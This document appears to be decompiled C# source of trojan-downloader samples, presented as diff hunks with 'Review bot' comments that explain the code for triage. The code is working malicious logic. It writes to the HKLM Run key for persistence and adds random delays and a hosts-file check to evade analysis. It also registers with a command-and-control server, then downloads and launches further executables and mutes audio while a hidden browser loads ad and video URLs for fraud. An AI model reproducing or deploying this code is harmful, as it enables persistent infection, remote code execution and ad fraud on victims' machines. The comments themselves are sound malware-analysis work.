if (this.webBrowser1.Document != (HtmlDocument) null)
{
foreach (HtmlElement link in this.webBrowser1.Document.Links)
{
string attribute = link.GetAttribute("href");
stringList.Add(attribute);
if (!attribute.Contains("//webcache.googleusercontent.com") && !attribute.Contains("&amp;q=related:") && link.GetAttribute("href").Contains(url))
{
link.RaiseEvent("onmouseover");
link.RaiseEvent("onmousedown");
link.InvokeMember("Click");
flag = true;
break;
}
}
}
return flag;
}
private void SureliIslet(Form1.SureliFonksiyon x, int min, int max)
{
System.Windows.Forms.Timer timer = new System.Windows.Forms.Timer()
{
Interval = this.rnd.Next(min, max)
};
timer.Tick += (EventHandler) ((s, ev) =>
{
x();
((System.Windows.Forms.Timer) s).Stop();
((Component) s).Dispose();
});
timer.Start();
}
private void PanelAyarla()
{
string newValue = "";
WebHeaderCollection headerCollection1 = new WebHeaderCollection();
headerCollection1.Add("User-Agent", "Mozilla/4.0 (compatiple; MSIE 6.0; Windows NT 5.1)");
WebHeaderCollection headerCollection2 = headerCollection1;
using (WebClient webClient = new WebClient()
{
Encoding = Encoding.Default,
Headers = headerCollection2
})
{
try
{
newValue = new Regex("1(.*?)2", RegexOptions.IgnoreCase | RegexOptions.Compiled).Match(webClient.DownloadString(this.ana)).Groups[1].ToString();
}
catch (Exception ex)
{
Environment.Exit(-1);
}
}
this.baba = this.baba.Replace("[DEGISTIR]", newValue);
}
private void Form1_Load(object sender, EventArgs e)
{
this.Size = new Size(this.rnd.Next(1024, 1366), this.rnd.Next(768, 768));
Form1.SetWindowLong(this.Handle, -20, Form1.GetWindowLong(this.Handle, -20) | 128);
this.ieKontrol();
this.PanelAyarla();
this.KelimeleriCek();
Araclar.DisableClickSounds();
this.Basla();
}
private void ieKontrol()
{
if (new WebBrowser().Version.Major < 7)
Environment.Exit(-1);
}
private delegate void SureliFonksiyon();
}
}
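Review bot: `PanelAyarla` and `KelimeleriCek` are undocumented, although together they form a two-stage configuration fetch that the Turkish identifiers do not make obvious. `PanelAyarla` downloads the page at `ana`, takes the text matched by `1(.*?)2` and substitutes it for `[DEGISTIR]` in `baba`; `KelimeleriCek` then downloads `baba` and parses `keyword|domain` lines into `kelimelistesi` and `gezilenler`. I would add `// Stage 1: resolve the host placeholder in baba from the page at ana` and `// Stage 2: fetch the keyword|domain work list` above the two methods. The hard-coded `User-Agent` in `PanelAyarla` contains the misspelling `compatiple`, which is worth a comment as a network detection anchor. The same goes for the two `RunDll32.exe` launches with `InetCpl.cpl,ClearMyTracksByProcess` in `DeleteCache`, which are visible in process telemetry.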
@@ -0,0 +1,46 @@
// Decompiled with JetBrains decompiler
// Type: browser_bastan.Program
// Assembly: Java Update, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: 9303C6B7-A9B1-42D1-950C-FCE2C64C3FE0
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare.00004-msil\Trojan-Downloader.Win32.Dapato.lnz-b8c384980c9f22185c34463ff696eecea0ea8f5afe9bfe8909d6e74753ffabcd.exe
using SmartAssembly.MemoryManagement;
using System;
using System.IO;
using System.Threading;
using System.Windows.Forms;
namespace browser_bastan
{
internal static class Program
{
public static Mutex AppMutex = new Mutex(true, "{8F6F0AC4-B9A1-45fd-A8CF-72F04X6FDKCK}");
[STAThread]
private static void Main()
{
MemoryManager.AttachApp();
if (Program.AppMutex.WaitOne(TimeSpan.Zero, true))
{
Program.CheckHostsFile();
string path = Environment.GetFolderPath(Environment.SpecialFolder.LocalApplicationData) + "\\" + Araclar.DstName;
Araclar.DstCheck();
Araclar.Startup(Araclar.Regkeyname, path);
Thread.Sleep(new Random().Next(5000, 60000));
Application.EnableVisualStyles();
Application.SetCompatibleTextRenderingDefault(false);
Application.Run((Form) new Form1());
Program.AppMutex.ReleaseMutex();
}
else
Environment.Exit(1);
}
public static void CheckHostsFile()
{
if (!File.ReadAllText(Environment.GetEnvironmentVariable("windir") + "\\system32\\drivers\\etc\\hosts").Contains("nurullahuzmez.com"))
return;
Environment.Exit(1);
}
}
}
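Review bot: `CheckHostsFile` needs a comment because its effect is easy to misread: the process exits with code 1 when the hosts file contains `nurullahuzmez.com`, the same host `Form1.ana` points at. Suggested: `// Exit if the hosts file mentions the config domain (presumably because it has been blocked or redirected locally)`. In `Main`, `Araclar.DstCheck()` and `Araclar.Startup(...)` run before `Thread.Sleep(new Random().Next(5000, 60000))`, so the copy and the Run value already exist if analysis stops during the delay. A line `// persistence is written before the randomized 5-60 s delay` above the sleep would record that. The fixed name passed to `new Mutex(true, ...)` could likewise be labelled `// single-instance guard; constant name usable as a host indicator`.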
@@ -0,0 +1,16 @@
using System.Reflection;
using System.Runtime.InteropServices;
using System.Security.Permissions;
[assembly: AssemblyTitle("mute")]
[assembly: AssemblyConfiguration("")]
[assembly: AssemblyCompany("air")]
[assembly: AssemblyDescription("")]
[assembly: AssemblyProduct("mute")]
[assembly: AssemblyCopyright("Copyright © air 2010")]
[assembly: AssemblyTrademark("")]
[assembly: ComVisible(false)]
[assembly: Guid("88bfcd0a-bf33-474b-8188-e86f77d32965")]
[assembly: AssemblyFileVersion("1.0.0.0")]
[assembly: AssemblyVersion("1.0.0.0")]
[assembly: RegistryPermission(SecurityAction.RequestMinimum, Create = "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Write = "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run")]
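Review bot: The `RegistryPermission` attribute on the last line deserves a comment, since it is the only entry in this metadata that states intent: it requests `Create` and `Write` on `HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run`. I would add `// requests write access to the HKLM Run key; compare AutoStart/RemoveAutoStart in mute.Form1` above it, so static triage of the assembly attributes is tied to the code that uses the key. That this file belongs to the same assembly as `mute.Form1` is inferred from the shared `mute` name, because the section carries no decompiler header.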
@@ -0,0 +1,711 @@
// Decompiled with JetBrains decompiler
// Type: mute.Form1
// Assembly: explorer, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: 772D6407-3F7F-4A01-A630-EF8C6D749DE8
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00002-msil\Trojan-Downloader.Win32.FraudLoad.yjmx-bf19859422e8892dcad392d861505005b20bd4fdd2f7d81fdd3c89ab387e68c8.exe
using Microsoft.Win32;
using System;
using System.ComponentModel;
using System.Diagnostics;
using System.Drawing;
using System.IO;
using System.Net;
using System.Runtime.InteropServices;
using System.Threading;
using System.Web;
using System.Windows.Forms;
namespace mute
{
public class Form1 : Form
{
private const int FEATURE_DISABLE_NAVIGATION_SOUNDS = 21;
private const int SET_FEATURE_ON_THREAD = 1;
private const int SET_FEATURE_ON_PROCESS = 2;
private const int SET_FEATURE_IN_REGISTRY = 4;
private const int SET_FEATURE_ON_THREAD_LOCALMACHINE = 8;
private const int SET_FEATURE_ON_THREAD_INTRANET = 16;
private const int SET_FEATURE_ON_THREAD_TRUSTED = 32;
private const int SET_FEATURE_ON_THREAD_INTERNET = 64;
private const int SET_FEATURE_ON_THREAD_RESTRICTED = 128;
private IContainer components = (IContainer) null;
private Panel panel1;
private Button button1;
private Panel panel2;
private WebBrowser web;
private TextBox txtUrl;
private CheckBox chkMute;
private Panel panel3;
private TextBox txtLog;
private CheckBox chkDouble;
private BackgroundWorker worker;
private Button btnSetting;
private CheckBox chkHide;
private Button btnDisableAutostart;
private Button button2;
private string APP_VER = "";
private string DATA_VER = "";
private string DATA = "";
private int START_NO = 0;
private string USERID = "";
private string MEMO = "";
private bool DONE = false;
private bool SupportMuteApplication = false;
private string URL = "";
private int PING_HITS = 5;
private int PING_SECONDS = 60;
private int DELAY = 0;
private bool LOG = false;
protected override void Dispose(bool disposing)
{
if (disposing && this.components != null)
this.components.Dispose();
base.Dispose(disposing);
}
private void InitializeComponent()
{
this.panel1 = new Panel();
this.button2 = new Button();
this.btnDisableAutostart = new Button();
this.chkHide = new CheckBox();
this.btnSetting = new Button();
this.chkDouble = new CheckBox();
this.chkMute = new CheckBox();
this.txtUrl = new TextBox();
this.button1 = new Button();
this.panel2 = new Panel();
this.web = new WebBrowser();
this.panel3 = new Panel();
this.txtLog = new TextBox();
this.worker = new BackgroundWorker();
this.panel1.SuspendLayout();
this.panel2.SuspendLayout();
this.panel3.SuspendLayout();
this.SuspendLayout();
this.panel1.Controls.Add((Control) this.button2);
this.panel1.Controls.Add((Control) this.btnDisableAutostart);
this.panel1.Controls.Add((Control) this.chkHide);
this.panel1.Controls.Add((Control) this.btnSetting);
this.panel1.Controls.Add((Control) this.chkDouble);
this.panel1.Controls.Add((Control) this.chkMute);
this.panel1.Controls.Add((Control) this.txtUrl);
this.panel1.Controls.Add((Control) this.button1);
this.panel1.Dock = DockStyle.Top;
this.panel1.Location = new Point(0, 0);
this.panel1.Name = "panel1";
this.panel1.Size = new Size(604, 87);
this.panel1.TabIndex = 0;
this.button2.Location = new Point(167, 41);
this.button2.Name = "button2";
this.button2.Size = new Size(49, 23);
this.button2.TabIndex = 7;
this.button2.Text = "Nav";
this.button2.UseVisualStyleBackColor = true;
this.button2.Click += new EventHandler(this.button2_Click);
this.btnDisableAutostart.Location = new Point(222, 41);
this.btnDisableAutostart.Name = "btnDisableAutostart";
this.btnDisableAutostart.Size = new Size(136, 23);
this.btnDisableAutostart.TabIndex = 6;
this.btnDisableAutostart.Text = "Disable Autostart";
this.btnDisableAutostart.UseVisualStyleBackColor = true;
this.btnDisableAutostart.Click += new EventHandler(this.btnDisableAutostart_Click);
this.chkHide.AutoSize = true;
this.chkHide.Location = new Point(366, 16);
this.chkHide.Name = "chkHide";
this.chkHide.Size = new Size(48, 16);
this.chkHide.TabIndex = 5;
this.chkHide.Text = "Hide";
this.chkHide.UseVisualStyleBackColor = true;
this.chkHide.CheckedChanged += new EventHandler(this.chkHide_CheckedChanged);
this.btnSetting.Location = new Point(277, 12);
this.btnSetting.Name = "btnSetting";
this.btnSetting.Size = new Size(81, 23);
this.btnSetting.TabIndex = 4;
this.btnSetting.Text = "User Data";
this.btnSetting.UseVisualStyleBackColor = true;
this.btnSetting.Click += new EventHandler(this.btnSetting_Click);
this.chkDouble.AutoSize = true;
this.chkDouble.Checked = true;
this.chkDouble.CheckState = CheckState.Checked;
this.chkDouble.Location = new Point(502, 16);
this.chkDouble.Name = "chkDouble";
this.chkDouble.Size = new Size(96, 16);
this.chkDouble.TabIndex = 3;
this.chkDouble.Text = "Double Check";
this.chkDouble.UseVisualStyleBackColor = true;
this.chkMute.AutoSize = true;
this.chkMute.Checked = true;
this.chkMute.CheckState = CheckState.Checked;
this.chkMute.Location = new Point(420, 16);
this.chkMute.Name = "chkMute";
this.chkMute.Size = new Size(78, 16);
this.chkMute.TabIndex = 2;
this.chkMute.Text = "Auto Mute";
this.chkMute.UseVisualStyleBackColor = true;
this.txtUrl.Location = new Point(3, 14);
this.txtUrl.Name = "txtUrl";
this.txtUrl.Size = new Size(213, 21);
this.txtUrl.TabIndex = 1;
this.txtUrl.Text = "http://www.youtube.com/watch?v=WwfNexdaIdU&feature=topvideos";
this.button1.Location = new Point(222, 12);
this.button1.Name = "button1";
this.button1.Size = new Size(49, 23);
this.button1.TabIndex = 0;
this.button1.Text = "Go";
this.button1.UseVisualStyleBackColor = true;
this.button1.Click += new EventHandler(this.button1_Click);
this.panel2.Controls.Add((Control) this.web);
this.panel2.Dock = DockStyle.Fill;
this.panel2.Location = new Point(0, 87);
this.panel2.Name = "panel2";
this.panel2.Size = new Size(604, 98);
this.panel2.TabIndex = 1;
this.web.Dock = DockStyle.Fill;
this.web.Location = new Point(0, 0);
this.web.MinimumSize = new Size(20, 20);
this.web.Name = "web";
this.web.Size = new Size(604, 98);
this.web.TabIndex = 0;
this.web.ProgressChanged += new WebBrowserProgressChangedEventHandler(this.web_ProgressChanged);
this.web.DocumentCompleted += new WebBrowserDocumentCompletedEventHandler(this.web_DocumentCompleted);
this.panel3.Controls.Add((Control) this.txtLog);
this.panel3.Dock = DockStyle.Bottom;
this.panel3.Location = new Point(0, 185);
this.panel3.Name = "panel3";
this.panel3.Size = new Size(604, 137);
this.panel3.TabIndex = 3;
this.txtLog.Dock = DockStyle.Fill;
this.txtLog.Location = new Point(0, 0);
this.txtLog.Multiline = true;
this.txtLog.Name = "txtLog";
this.txtLog.Size = new Size(604, 137);
this.txtLog.TabIndex = 0;
this.worker.WorkerReportsProgress = true;
this.worker.DoWork += new DoWorkEventHandler(this.worker_DoWork);
this.worker.RunWorkerCompleted += new RunWorkerCompletedEventHandler(this.worker_RunWorkerCompleted);
this.worker.ProgressChanged += new ProgressChangedEventHandler(this.worker_ProgressChanged);
this.AutoScaleDimensions = new SizeF(6f, 12f);
this.AutoScaleMode = AutoScaleMode.Font;
this.ClientSize = new Size(604, 322);
this.Controls.Add((Control) this.panel2);
this.Controls.Add((Control) this.panel1);
this.Controls.Add((Control) this.panel3);
this.Name = nameof (Form1);
this.Text = nameof (Form1);
this.WindowState = FormWindowState.Minimized;
this.Load += new EventHandler(this.Form1_Load);
this.panel1.ResumeLayout(false);
this.panel1.PerformLayout();
this.panel2.ResumeLayout(false);
this.panel3.ResumeLayout(false);
this.panel3.PerformLayout();
this.ResumeLayout(false);
}
[DllImport("urlmon.dll")]
[return: MarshalAs(UnmanagedType.Error)]
private static extern int CoInternetSetFeatureEnabled(
int FeatureEntry,
[MarshalAs(UnmanagedType.U4)] int dwFlags,
bool fEnable);
public Form1() => this.InitializeComponent();
private void Nav(string url) => this.web.Navigate(url);
private void StopNav()
{
this.web.Stop();
while (this.web.IsBusy)
Thread.Sleep(2000);
}
private void RemoveAutoStart(string name)
{
RegistryKey localMachine = Registry.LocalMachine;
RegistryKey subKey = localMachine.CreateSubKey("SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\");
try
{
subKey.DeleteValue(name);
localMachine.Close();
}
catch (Exception ex)
{
}
}
private bool AutoStart(string name, string path)
{
RegistryKey localMachine = Registry.LocalMachine;
bool flag = false;
try
{
localMachine.CreateSubKey("SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\").SetValue(name, (object) path);
localMachine.Close();
flag = true;
}
catch (Exception ex)
{
int num = (int) MessageBox.Show("Please run this app as Administrator so it can be installed correctly...");
}
return flag;
}
protected override void SetVisibleCore(bool value)
{
if (this.IsHide())
{
base.SetVisibleCore(false);
this.init();
}
else
base.SetVisibleCore(true);
}
private void DoWork()
{
while (true)
{
this.SupportMuteApplication = this.MuteApplication();
string[] strArray = this.DATA.Split('\n');
int hits = 0;
int startNo = this.START_NO;
DateTime now = DateTime.Now;
for (int index1 = this.START_NO + 1; index1 < strArray.Length; ++index1)
{
try
{
string s = strArray[index1].Trim();
if (!(s == "") && !char.IsDigit(s, 0))
{
if (!s.StartsWith("http://", StringComparison.InvariantCultureIgnoreCase))
s = "http://" + s;
string str1 = s.Replace("http://il.", "http://www.");
this.DONE = false;
this.URL = str1.ToUpper();
this.worker.ReportProgress(0, (object) string.Format("No {0} video begin:{1}", (object) (startNo + 1), (object) str1));
bool flag = str1.StartsWith("http://www.youtube.com", StringComparison.InvariantCultureIgnoreCase);
if (!this.SupportMuteApplication && !flag)
{
++startNo;
this.worker.ReportProgress(0, (object) string.Format("Skip {0} on OS lower than vista!", (object) (startNo + 1)));
Thread.Sleep(500);
}
else
{
this.web.Invoke((Delegate) new Form1.NavTo(this.Nav), (object) str1);
for (int index2 = 0; !this.DONE && index2 < 60; ++index2)
Thread.Sleep(2000);
if (this.DONE)
this.worker.ReportProgress(0, (object) string.Format("Page load finished!Sleep {0} ms...", (object) this.DELAY));
else
this.worker.ReportProgress(0, (object) string.Format("Time out!Sleep {0} ms...", (object) this.DELAY));
Thread.Sleep(this.DELAY);
TimeSpan timeSpan = DateTime.Now - now;
if (this.DONE)
++hits;
this.LogLocal(string.Format("TS:{0},PingSecond:{1},Hits:{2},PingHits:{3}\r\n", (object) (int) timeSpan.TotalSeconds, (object) this.PING_SECONDS, (object) hits, (object) this.PING_HITS));
if (hits > this.PING_HITS || (int) timeSpan.TotalSeconds > this.PING_SECONDS)
{
string str2 = this.Ping(hits);
hits = 0;
now = DateTime.Now;
if (str2.Trim() == "config")
this.ConfigClient(this.USERID, this.MEMO);
}
System.IO.File.WriteAllText(this.GetProcessFile(), index1.ToString());
++startNo;
if (this.DONE)
this.worker.ReportProgress(0, (object) string.Format("No {0} video finished:{1}", (object) startNo, (object) str1));
else
this.worker.ReportProgress(0, (object) string.Format("No {0} video failed:{1}", (object) startNo, (object) str1));
}
}
}
catch (Exception ex)
{
this.worker.ReportProgress(0, (object) string.Format("Raise exception in worker loop:{0}", (object) ex.Message));
++startNo;
}
}
this.RefreshData();
this.START_NO = 0;
}
}
private void web_DocumentCompleted(object sender, WebBrowserDocumentCompletedEventArgs e)
{
string upper1 = e.Url.AbsoluteUri.ToUpper();
bool flag = this.URL.StartsWith("HTTP://WWW.YOUTUBE.COM/WATCH");
if (flag && upper1.StartsWith("HTTP://WWW.YOUTUBE.COM/WATCH"))
{
int num1 = -99;
int num2 = 0;
this.Log(upper1);
while (num1 == -99 && num2 < 10)
{
++num2;
HtmlElement elementById = this.web.Document.GetElementById("movie_player");
try
{
num1 = (int) elementById.InvokeMember("getPlayerState");
elementById.InvokeMember("mute");
this.Log("Mute successfully!");
this.DONE = true;
}
catch (Exception ex)
{
this.Log("Mute failed:" + ex.Message + ",will try again...");
}
Thread.Sleep(300);
}
}
if (flag && this.DONE && this.chkDouble.Checked)
this.web.Navigate("javascript:document.getElementById('movie_player').mute();");
string upper2 = ((WebBrowser) sender).Document.Url.ToString().ToUpper();
if (flag || !(this.URL == upper1) && !(this.URL + "/" == upper1) || !(this.URL == upper2) && !(this.URL + "/" == upper2) || ((WebBrowser) sender).IsOffline)
return;
this.DONE = true;
}
private void LogLocal(string msg) => System.IO.File.AppendAllText(Path.Combine(Application.UserAppDataPath, "log.txt"), msg + Environment.NewLine);
private void FormLog(string msg)
{
TextBox txtLog = this.txtLog;
txtLog.Text = txtLog.Text + DateTime.Now.ToString("G") + msg + "\r\n";
this.txtLog.SelectAll();
this.txtLog.ScrollToCaret();
this.txtLog.Select(0, 0);
}
private void Log(string msg)
{
if (this.LOG)
{
string address = string.Format("http://isthisactuallyadomain.info/log.php?user={0}&memo={1}&msg={2}", (object) this.USERID, (object) this.MEMO, (object) HttpUtility.UrlEncode(msg));
WebClient webClient = new WebClient();
try
{
webClient.DownloadString(address);
}
catch (Exception ex)
{
msg = msg + " #Log to server failed." + ex.Message;
}
}
if (this.txtLog.InvokeRequired)
{
this.txtLog.Invoke((Delegate) (() =>
{
TextBox txtLog = this.txtLog;
txtLog.Text = txtLog.Text + DateTime.Now.ToString("G") + msg + "\r\n";
this.txtLog.SelectAll();
this.txtLog.ScrollToCaret();
this.txtLog.Select(0, 0);
}));
}
else
{
TextBox txtLog = this.txtLog;
txtLog.Text = txtLog.Text + DateTime.Now.ToString("G") + msg + "\r\n";
this.txtLog.SelectAll();
this.txtLog.ScrollToCaret();
this.txtLog.Select(0, 0);
Application.DoEvents();
}
}
private void button1_Click(object sender, EventArgs e) => this.Go();
private void Go()
{
this.web.ScriptErrorsSuppressed = true;
Form1.CoInternetSetFeatureEnabled(21, 2, true);
string processFile = this.GetProcessFile();
this.START_NO = 0;
if (System.IO.File.Exists(this.GetProcessFile()))
{
string[] strArray = System.IO.File.ReadAllLines(processFile);
if (strArray.Length > 1)
int.TryParse(strArray[0], out this.START_NO);
}
this.worker.RunWorkerAsync();
}
private void web_ProgressChanged(object sender, WebBrowserProgressChangedEventArgs e)
{
}
private string Ping(int hits)
{
WebClient webClient = new WebClient();
string address = string.Format("http://isthisactuallyadomain.info/ping.php?user={0}&memo={1}&version={2}&profile={3}", (object) this.USERID, (object) this.MEMO, (object) "20110123", (object) Environment.OSVersion.VersionString);
if (hits > 0)
address = address + "&hits=" + hits.ToString();
return webClient.DownloadString(address);
}
private string GetUserDataPath() => Application.UserAppDataPath;
private string GetProcessFile() => this.GetUserDataPath() + "\\process.txt";
private string GetConfigFile() => this.GetUserDataPath() + "\\config.txt";
private string GetUserFile() => this.GetUserDataPath() + "\\user.txt";
private bool IsHide() => System.IO.File.Exists(Path.Combine(Application.UserAppDataPath, "hide.txt"));
private int GetAffiliateID()
{
FileStream fileStream = System.IO.File.OpenRead(Application.ExecutablePath);
fileStream.Seek(-1L, SeekOrigin.End);
return fileStream.ReadByte();
}
private void HideMe()
{
this.Opacity = 0.0;
this.ShowInTaskbar = false;
System.IO.File.WriteAllText(Path.Combine(Application.UserAppDataPath, "hide.txt"), "empty");
}
private void Form1_Load(object sender, EventArgs e)
{
this.Text = Application.ExecutablePath;
this.init();
}
private bool MuteApplication()
{
if (Environment.OSVersion.Version.Major <= 5)
return false;
Form1.SetVolume(0);
return true;
}
private bool UnMuteApplication()
{
if (Environment.OSVersion.Version.Major <= 5)
return false;
Form1.SetVolume((int) ushort.MaxValue);
return true;
}
[DllImport("winmm.dll")]
private static extern int waveOutGetVolume(IntPtr hwo, out uint dwVolume);
[DllImport("winmm.dll")]
private static extern int waveOutSetVolume(IntPtr hwo, uint dwVolume);
public static int GetVolume()
{
uint dwVolume = 0;
Form1.waveOutGetVolume(IntPtr.Zero, out dwVolume);
return (int) (ushort) (dwVolume & (uint) ushort.MaxValue) / 6553;
}
public static void SetVolume(int volume)
{
int num = 6553 * volume;
uint dwVolume = (uint) (num & (int) ushort.MaxValue | num << 16);
Form1.waveOutSetVolume(IntPtr.Zero, dwVolume);
}
public void Clean()
{
this.RemoveAutoStart("mute");
Directory.Delete(Application.UserAppDataPath, true);
}
public void ShowAffiateID()
{
int num = (int) MessageBox.Show(this.GetAffiliateID().ToString());
Application.Exit();
}
private void init()
{
string configFile = this.GetConfigFile();
if (System.IO.File.Exists(configFile))
{
string[] strArray = System.IO.File.ReadAllLines(configFile);
if (strArray.Length > 3)
{
this.APP_VER = strArray[0];
this.DATA_VER = strArray[2];
this.DATA = string.Join("\n", strArray, 4, strArray.Length - 4);
}
}
this.Log("Check upgrade app.ver20110123");
WebClient webClient = new WebClient();
string[] strArray1 = webClient.DownloadString("http://isthisactuallyadomain.info/check_update.php").Split('\n');
this.LogLocal("Generate updater");
string str1 = Path.Combine(Application.UserAppDataPath, "updater.exe");
if (Path.GetDirectoryName(Application.ExecutablePath) != Application.UserAppDataPath)
{
if (!this.AutoStart("mute", str1))
{
Application.Exit();
}
else
{
if (!System.IO.File.Exists(str1))
{
webClient.DownloadFile(strArray1[1], str1);
this.Log("updater installed:" + str1);
}
this.GetUserID();
Process.Start(str1);
this.Log("launch updater ok" + str1);
Application.Exit();
}
}
else
{
if (this.IsHide())
this.HideMe();
this.GetUserID();
this.ConfigClient(this.USERID, this.MEMO);
this.Log("Config client ok.");
string str2 = webClient.DownloadString(string.Format("http://isthisactuallyadomain.info/check_update.php?user={0}&memo={1}", (object) this.USERID, (object) this.MEMO));
string[] contents = str2.Split('\n');
this.Log("Check update info ok:" + str2);
string str3 = Path.Combine(Application.UserAppDataPath, "explorer.exe");
if (str3 != Application.ExecutablePath)
{
if (string.Compare(this.APP_VER, contents[0]) < 0)
{
webClient.DownloadFile(contents[1], str3);
this.Log("app upgraded:" + str3);
}
if (!System.IO.File.Exists(str3))
webClient.DownloadFile(contents[1], str3);
Process.Start(str3);
this.Log("launch app ok" + str3);
this.LogLocal("Launch app");
Application.Exit();
}
else
{
this.APP_VER = contents[0];
string str4 = contents[1];
string address = contents[3];
if (string.Compare(this.DATA_VER, contents[2]) < 0)
{
this.DATA = webClient.DownloadString(address);
this.DATA_VER = contents[2];
this.Log("Data upgraded:" + address);
}
System.IO.File.WriteAllLines(configFile, contents);
System.IO.File.AppendAllText(configFile, this.DATA);
this.Log("About to start the worker loop");
this.LogLocal("Start worker loop.ver20110123");
this.Go();
}
}
}
private void GetUserID()
{
this.LogLocal("Register or get user id.");
string userFile = this.GetUserFile();
if (System.IO.File.Exists(userFile))
{
string[] strArray = System.IO.File.ReadAllLines(userFile);
this.USERID = strArray[0];
this.MEMO = strArray[1];
}
else
{
this.Register("friend");
string[] contents = new string[2]
{
this.USERID,
this.MEMO
};
System.IO.File.WriteAllLines(userFile, contents);
}
this.Ping(0);
this.LogLocal("Open data file");
this.Log("Get userid&meo from :" + userFile);
}
private void ConfigClient(string userid, string memo)
{
string[] strArray = new WebClient().DownloadString(string.Format("http://isthisactuallyadomain.info/config.php?user={0}&memo={1}", (object) userid, (object) memo)).Split('\n');
int.TryParse(strArray[0].Trim(), out this.PING_SECONDS);
int.TryParse(strArray[1].Trim(), out this.PING_HITS);
if (strArray[2].Trim() == "Log")
this.LOG = true;
int.TryParse(strArray[3].Trim(), out this.DELAY);
this.DELAY *= 1000;
}
private void RefreshData()
{
try
{
WebClient webClient = new WebClient();
string[] contents = webClient.DownloadString(string.Format("http://isthisactuallyadomain.info/check_update.php?user={0}&memo={1}", (object) this.USERID, (object) this.MEMO)).Split('\n');
if (contents.Length < 4)
return;
this.APP_VER = contents[0];
string str = contents[1];
string address = contents[3];
if (string.Compare(this.DATA_VER, contents[2]) < 0)
{
string configFile = this.GetConfigFile();
this.DATA = webClient.DownloadString(address);
this.DATA_VER = contents[2];
System.IO.File.WriteAllLines(configFile, contents);
System.IO.File.AppendAllText(configFile, this.DATA);
}
}
catch (Exception ex)
{
this.worker.ReportProgress(0, (object) ("Raise a exception in RefreshData:" + ex.Message));
}
}
private void Register(string affiliate)
{
this.MEMO = DateTime.Now.Ticks.ToString();
this.USERID = new WebClient().DownloadString(string.Format("http://isthisactuallyadomain.info/register.php?memo={0}&affiliate={1}&profile={2}", (object) this.MEMO, (object) affiliate, (object) Environment.OSVersion.VersionString)).Trim();
this.Log(string.Format("Register with server ok:{0},{1}", (object) this.USERID, (object) this.MEMO));
}
private void worker_DoWork(object sender, DoWorkEventArgs e) => this.DoWork();
private void worker_ProgressChanged(object sender, ProgressChangedEventArgs e) => this.Log((string) e.UserState);
private void worker_RunWorkerCompleted(object sender, RunWorkerCompletedEventArgs e) => this.Log("Done!");
private void btnSetting_Click(object sender, EventArgs e) => Process.Start(Application.UserAppDataPath);
private void chkHide_CheckedChanged(object sender, EventArgs e)
{
if (!this.chkHide.Checked)
return;
this.WindowState = FormWindowState.Minimized;
this.HideMe();
}
private void btnDisableAutostart_Click(object sender, EventArgs e) => this.RemoveAutoStart("mute");
private void button2_Click(object sender, EventArgs e)
{
this.web.Stop();
this.web.Navigate(this.txtUrl.Text);
}
private delegate void NavTo(string url);
private delegate void StopWeb();
private delegate void UICode();
}
}
@@ -0,0 +1,120 @@
<?xml version="1.0" encoding="utf-8"?>
<root>
<!--
Microsoft ResX Schema
Version 2.0
The primary goals of this format is to allow a simple XML format
that is mostly human readable. The generation and parsing of the
various data types are done through the TypeConverter classes
associated with the data types.
Example:
... ado.net/XML headers & schema ...
<resheader name="resmimetype">text/microsoft-resx</resheader>
<resheader name="version">2.0</resheader>
<resheader name="reader">System.Resources.ResXResourceReader, System.Windows.Forms, ...</resheader>
<resheader name="writer">System.Resources.ResXResourceWriter, System.Windows.Forms, ...</resheader>
<data name="Name1"><value>this is my long string</value><comment>this is a comment</comment></data>
<data name="Color1" type="System.Drawing.Color, System.Drawing">Blue</data>
<data name="Bitmap1" mimetype="application/x-microsoft.net.object.binary.base64">
<value>[base64 mime encoded serialized .NET Framework object]</value>
</data>
<data name="Icon1" type="System.Drawing.Icon, System.Drawing" mimetype="application/x-microsoft.net.object.bytearray.base64">
<value>[base64 mime encoded string representing a byte array form of the .NET Framework object]</value>
<comment>This is a comment</comment>
</data>
There are any number of "resheader" rows that contain simple
name/value pairs.
Each data row contains a name, and value. The row also contains a
type or mimetype. Type corresponds to a .NET class that support
text/value conversion through the TypeConverter architecture.
Classes that don't support this are serialized and stored with the
mimetype set.
The mimetype is used for serialized objects, and tells the
ResXResourceReader how to depersist the object. This is currently not
extensible. For a given mimetype the value must be set accordingly:
Note - application/x-microsoft.net.object.binary.base64 is the format
that the ResXResourceWriter will generate, however the reader can
read any of the formats listed below.
mimetype: application/x-microsoft.net.object.binary.base64
value : The object must be serialized with
: System.Runtime.Serialization.Formatters.Binary.BinaryFormatter
: and then encoded with base64 encoding.
mimetype: application/x-microsoft.net.object.soap.base64
value : The object must be serialized with
: System.Runtime.Serialization.Formatters.Soap.SoapFormatter
: and then encoded with base64 encoding.
mimetype: application/x-microsoft.net.object.bytearray.base64
value : The object must be serialized into a byte array
: using a System.ComponentModel.TypeConverter
: and then encoded with base64 encoding.
-->
<xsd:schema id="root" xmlns="" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:msdata="urn:schemas-microsoft-com:xml-msdata">
<xsd:import namespace="http://www.w3.org/XML/1998/namespace" />
<xsd:element name="root" msdata:IsDataSet="true">
<xsd:complexType>
<xsd:choice maxOccurs="unbounded">
<xsd:element name="metadata">
<xsd:complexType>
<xsd:sequence>
<xsd:element name="value" type="xsd:string" minOccurs="0" />
</xsd:sequence>
<xsd:attribute name="name" use="required" type="xsd:string" />
<xsd:attribute name="type" type="xsd:string" />
<xsd:attribute name="mimetype" type="xsd:string" />
<xsd:attribute ref="xml:space" />
</xsd:complexType>
</xsd:element>
<xsd:element name="assembly">
<xsd:complexType>
<xsd:attribute name="alias" type="xsd:string" />
<xsd:attribute name="name" type="xsd:string" />
</xsd:complexType>
</xsd:element>
<xsd:element name="data">
<xsd:complexType>
<xsd:sequence>
<xsd:element name="value" type="xsd:string" minOccurs="0" msdata:Ordinal="1" />
<xsd:element name="comment" type="xsd:string" minOccurs="0" msdata:Ordinal="2" />
</xsd:sequence>
